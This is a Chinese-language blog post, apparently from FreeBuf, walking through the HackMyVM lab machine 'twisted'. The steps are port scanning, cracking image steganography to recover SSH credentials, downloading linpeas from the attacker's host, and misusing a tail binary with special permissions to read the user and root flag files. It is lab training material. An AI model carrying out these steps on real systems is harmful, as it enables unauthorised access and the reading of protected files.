freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次hackmyvm综合靶场的渗透测试-twisted
2022-04-17 10:47:56
所属地 黑龙江省

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

信息收集阶段

KALI攻击机:192.168.1.128

靶机:未知

目标:root.txt和user.txt

nmap -sn 192.168.1.0/24

1650163332_625b7e84b4f54be10b94b.png!small?1650163334115

nmap -A -p1-65535 192.168.1.66

1650163338_625b7e8aa9622a4667dde.png!small?1650163340088

开启了80端口和2222端口,而且是ssh22端口修改为2222端口!

访问下80端口!!

漏洞利用阶段

http://192.168.1.66/

我喜欢猫,但是更喜欢这个,因为它不同!

1650163344_625b7e90be9905f577d7d.png!small?1650163346141

查看下源代码!

1650163352_625b7e981a05fb690f24f.png!small?1650163353434

我们查下下面那两张图是否有图片隐写!

exiftool cat-original.jpg

exiftool cat-hidden.jpg

扫描下目录看看!啥也没有!

看了大佬的WP,工具用错了!

stegcracker cat-hidden.jpg 采用默认的字典破解后,生成了一个密码!

1650163363_625b7ea3ea7de7d150fbe.png!small?1650163365481

sexymama

1650163370_625b7eaab472f9d5f8769.png!small?1650163372042

thisismypassword

stegcracker cat-original.jpg 采用默认的字典破解后,生成了一个密码!

1650163397_625b7ec5d55a45d295048.png!small?1650163399254

westlife

1650163403_625b7ecb690a042234bc8.png!small?1650163404802

markuslovesbonita

接下来,需要使用一个工具利用上文的密码破解图片中隐藏的数据!

steghide extract -sf cat-hidden.jpg

密码是:sexymama

1650163413_625b7ed525ec94d9cfb47.png!small?1650163414465

生成文件:mateo.txt

cat mateo.txt

Thisismypassword

steghide extract -sf cat-original.jpg

密码是:westlife

1650163477_625b7f154e7f253796a4d.png!small?1650163478653

生成文件:markus.txt

cat markus.txt

markuslovesbonita

感觉这个mateomarkus就是ssh的用户名!

对应前面提示,更新换下面那个!

所以实际可用的应该是!

用户名:mateo 密码:Thisismypassword 端口:2222

试一下!ssh mateo@192.168.1.66 -p2222

1650163495_625b7f2757f9fb3bb7ffa.png!small?1650163496875

找了下,没有flag!但有这个

1650163500_625b7f2cea779e6474d75.png!small?1650163502276

访问http://192.168.1.66/gogogo.wav直接下载!估计是个joke!

嘟嘟嘟,像是莫斯密码!

解密地址:

https://morsecode.world/international/decoder/audio-decoder-adaptive.html

解密信息:

G O D E E P E R . . . C O M E W I T H M E . . . L I T T L E R A B B I T . . .

一共这几个账户!

1650163514_625b7f3a95d6bfb45716b.png!small?1650163515926

我们在登录下markus账户!发现了这个!这个账户也没有flag!

1650163526_625b7f466f2c7bf9e45a2.png!small?1650163527818

先看下bonita目录,果然我们需要的在这,而且那个beroot应该是提权到root的程序!

1650163533_625b7f4d99355c1817c1f.png!small?1650163535044

我们用这个id_rsa登录bonita账户查看下!

但是经查看,我没有权限读取这个文件!

1650163543_625b7f57770a7a3b5d401.png!small?1650163544792

遇事不决上传脚本走起!

1650163547_625b7f5b822efb75cd83c.png!small?1650163548829

http://192.168.1.128:8000/linpeas.sh

1650163552_625b7f604c5acfa3a53a0.png!small?1650163553620

这里看到了特殊的文件权限:

1650163556_625b7f6492a0bd74ecc4c.png!small?1650163557911

1650163562_625b7f6a2736b532b46ab.png!small?1650163563453

我们这里直接读取flag文件内容:

1650163567_625b7f6f447229a51aacb.png!small?1650163568602

/usr/bin/tail -n 100 /home/bonita/user.txt

HM***********at

1650163584_625b7f804964f8097f359.png!small?1650163585642

/usr/bin/tail -n 100 /root/root.txt

HM************ycat

成功偷鸡!

这个就没有权限提升阶段了!

# 渗透测试 # web安全 # CTF # 靶场实战 # 靶场攻关
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录